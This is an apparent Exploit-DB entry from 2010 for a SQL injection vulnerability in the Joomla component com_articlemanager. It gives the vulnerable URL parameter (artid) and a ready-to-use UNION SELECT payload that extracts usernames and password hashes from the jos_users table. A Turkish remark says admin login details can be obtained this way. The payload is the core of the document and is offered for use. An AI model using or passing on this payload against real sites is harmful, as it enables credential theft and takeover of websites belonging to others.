Joomla! Component com_articlemanager - SQL Injection

EDB-ID:

11140


Author:

FL0RiX

Type:

webapps


Platform:

PHP

Date:

2010-01-14


########################################################################
#        Joomla Component com_articlemanager SQL Injection Vulnerability
########################################################################
# Author   :FL0RiX
#
# Name     : com_articlemanager
#
# Bug Type   : SQL Injection
#
# Infection    : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://[server]/index.php?option=com_articlemanager&Itemid=349&task=display&artid=
#
#EXPLOIT : null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users--
########################################################################